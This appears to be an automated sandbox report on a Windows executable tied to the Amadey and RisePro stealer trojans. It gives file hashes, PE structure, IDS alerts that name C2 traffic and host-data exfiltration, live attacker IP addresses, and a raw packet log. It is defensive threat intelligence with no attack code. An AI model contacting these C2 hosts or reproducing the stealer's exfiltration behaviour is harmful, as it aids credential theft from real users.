                                                                                                                                                                                                                                      Entropy (8bit):5.292262488069745
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:o7YQTzKjrL3AnFw4paFNW7xOkZfIt3UrkCq/srw:otoLcFx4kRIes4w
                                                                                                                                                                                                                                      MD5:2DB6AB32BE79D1F4C092D251080FD3FF
                                                                                                                                                                                                                                      SHA1:393B0124159B4B7269CABA1991D8BB0F24EBF073
                                                                                                                                                                                                                                      SHA-256:523799F3A4E2A3F4A453A43AC03CD6B01EFAC005DAB66CE87277B9CCEC7BB67F
                                                                                                                                                                                                                                      SHA-512:6D6DDA518FB82DE0D554B21810CC33A8C4708043377F4BA5C8AD1372DACAE52A02213C4A919EBF3AF27BEBFCE5432BAF0346A3E823A65AE442D1B9AF6D60BDFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220329
                                                                                                                                                                                                                                      Entropy (8bit):5.4443770705809635
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:4btvBkNQB0w3NSOm3Rt9whvd6Ptfk/7aNyHD9KhLh:A0a0wNmBwK67cyj4hLh
                                                                                                                                                                                                                                      MD5:4441DDED9C24D3329776DD10688D12A8
                                                                                                                                                                                                                                      SHA1:07FF661EB06DDD8858DA4B7AEE259597346D4881
                                                                                                                                                                                                                                      SHA-256:58D7D9D54FF03332C13E22B4471FA7FD3834E070934CB969AE3DEBCB05DEF767
                                                                                                                                                                                                                                      SHA-512:B4F891DB471F20287A21E6482B4E3C7A9D41422DCBF5F2DC08482C61FEC6D565279CA8DA3F7ABD944B5AD226C957CB10F4395760071B3A5DD030F635F3FA5C79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):6.559828656405516
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5:f854143c49c4d2fa4cf73bab97ba8d3a
                                                                                                                                                                                                                                      SHA1:62454e89cf9b2558347e2179f49fb4a56f4762ec
                                                                                                                                                                                                                                      SHA256:8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3
                                                                                                                                                                                                                                      SHA512:c0454ed9124cd768b0e6c8090f5943f7828263b94d00138b8a208fd59e52c28329ea4cc466ee7830471d5f765ca5c9bfc1b48bdc7a5352bec0a3e2c882c7b519
                                                                                                                                                                                                                                      SSDEEP:49152:hz28Myn3uFDrmGjA1n1Nrd/O9LunYp6VyiW9k2MYD:p28pn3yD6F7rd/OrYyiT2M
                                                                                                                                                                                                                                      TLSH:85D529A2A50B76CBD88E17749567CE827A7D46FA472048C3986CF47A7DA3CC131B5C38
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L..
                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                      Entrypoint:0x70d000
                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x65E4126F [Sun Mar 3 06:02:23 2024 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                      Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a056 | 0x6a | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x30bda8 | 0x10 | wvtamnbw
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x30bd58 | 0x18 | wvtamnbw
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x68000 | 0x2ea00 | 27f4d57c5ed4e794cf51622f55ec0a83 | False | 0.9975808478552279 | data | 7.974297481762842 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x69000 | 0x1e0 | 0x200 | 2946bf3dc91fdc7e68a887c12c4c9994 | False | 0.57421875 | data | 4.4501572571729415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x6a000 | 0x1000 | 0x200 | 17662c92043abde8b4b3074dcc401ca6 | False | 0.1484375 | data | 1.0249469107790772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| wvtamnbw | 0x6b000 | 0x2a1000 | 0x2a1000 | b01e7871d18fe1117f44ea4e5a2cd9a5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| jjaorssu | 0x30c000 | 0x1000 | 0x400 | bc61cab188c73f6e815600682569c50f | False | 0.833984375 | data | 6.4320942888563355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x30d000 | 0x3000 | 0x2200 | c1a4e0a38872d89768418c68b691c259 | False | 0.07915900735294118 | DOS executable (COM) | 0.7788648037350943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x30bdb8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 04/19/24-03:29:11.518092 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49719 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:29:07.505716 | TCP | 2855239 | ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) | 49717 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:30:04.436794 | TCP | 2856122 | ETPRO TROJAN Amadey CnC Response M1 | 80 | 49869 | 193.233.132.167 | 192.168.2.5 |
| 04/19/24-03:29:25.875488 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49768 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:29:36.618824 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49774 | 58709 | 192.168.2.5 | 147.45.47.93 |
| 04/19/24-03:29:15.465561 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49721 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:30:04.208351 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49870 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:21.206725 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49741 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:29:31.281244 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49762 | 58709 | 192.168.2.5 | 147.45.47.93 |
| 04/19/24-03:29:36.518747 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49773 | 58709 | 192.168.2.5 | 147.45.47.93 |
| 04/19/24-03:30:06.348500 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49880 | 80 | 192.168.2.5 | 193.233.132.167 |
| 04/19/24-03:30:07.998984 | TCP | 2044696 | ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 | 49886 | 80 | 192.168.2.5 | 193.233.132.167 |
| 04/19/24-03:29:23.961610 | TCP | 2049060 | ET TROJAN RisePro TCP Heartbeat Packet | 49762 | 58709 | 192.168.2.5 | 147.45.47.93 |
| 04/19/24-03:30:16.706571 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49918 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:08.315222 | TCP | 2856151 | ETPRO TROJAN Amadey CnC Activity M7 | 49718 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:29:47.530154 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49822 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:03.313673 | TCP | 2856147 | ETPRO TROJAN Amadey CnC Activity M3 | 49713 | 80 | 192.168.2.5 | 193.233.132.56 |
| 04/19/24-03:30:09.223113 | TCP | 2855239 | ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) | 49892 | 80 | 192.168.2.5 | 193.233.132.167 |
| 04/19/24-03:34:03.054930 | TCP | 2856147 | ETPRO TROJAN Amadey CnC Activity M3 | 50734 | 80 | 192.168.2.5 | 193.233.132.167 |
| 04/19/24-03:29:24.139646 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49762 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:30:08.961575 | TCP | 2856151 | ETPRO TROJAN Amadey CnC Activity M7 | 49890 | 80 | 192.168.2.5 | 193.233.132.167 |
| 04/19/24-03:29:24.405929 | TCP | 2046267 | ET TROJAN [ANY.RUN] RisePro TCP (External IP) | 58709 | 49762 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:03.820669 | TCP | 2856122 | ETPRO TROJAN Amadey CnC Response M1 | 80 | 49713 | 193.233.132.56 | 192.168.2.5 |
| 04/19/24-03:29:30.283553 | TCP | 2046267 | ET TROJAN [ANY.RUN] RisePro TCP (External IP) | 58709 | 49773 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:40.962203 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49809 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:30.339002 | TCP | 2046267 | ET TROJAN [ANY.RUN] RisePro TCP (External IP) | 58709 | 49774 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:30.018405 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49773 | 147.45.47.93 | 192.168.2.5 |
| 04/19/24-03:29:30.089886 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 58709 | 49774 | 147.45.47.93 | 192.168.2.5 |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510647058 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510706902 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510714054 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510761023 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510792971 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510812998 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510854006 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510899067 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510925055 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510936975 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510977983 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.510989904 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.511044979 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.511095047 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515682936 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515727043 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515754938 CEST49712443192.168.2.513.85.23.86
                                                                                                                                                                                                                                      Apr 19, 2024 03:28:53.515770912 CEST4434971213.85.23.86192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.068969965 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.069570065 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313261032 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313384056 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.313673019 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.314997911 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.315206051 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.315207005 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.557965994 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.558506012 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.558689117 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560514927 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560527086 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560641050 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560741901 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560781956 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560818911 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560858011 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560897112 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560935974 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560937881 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560945034 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560977936 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.560997009 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561017036 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561031103 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561055899 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561073065 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.561106920 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.805172920 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806427002 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806530952 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806543112 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806585073 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806602955 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806626081 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806647062 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806663990 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806684017 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806700945 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806720018 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806746006 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806756973 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806785107 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806802034 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806823015 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806838989 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806862116 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806879997 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806899071 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806917906 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806938887 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806962013 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806977987 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.806991100 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807015896 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807029963 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807054043 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807079077 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807092905 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807105064 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807133913 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807146072 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807174921 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807187080 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807213068 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807230949 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807255030 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807265997 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.807306051 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.820668936 CEST8049713193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:03.820761919 CEST4971380192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301548958 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301588058 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301605940 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301628113 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301640987 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301665068 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301676989 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301702976 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301714897 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301743984 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301757097 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301783085 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301805973 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301820993 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301836967 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301858902 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301871061 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301897049 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301908016 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301937103 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301948071 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301975965 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.301991940 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302016020 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302026033 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302054882 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302069902 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302093029 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302104950 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302130938 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302144051 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302172899 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302187920 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302212000 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302227974 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302249908 CEST8049714193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302261114 CEST4971480192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:04.302289963 CEST8049714193.233.132.56192.168.2.5
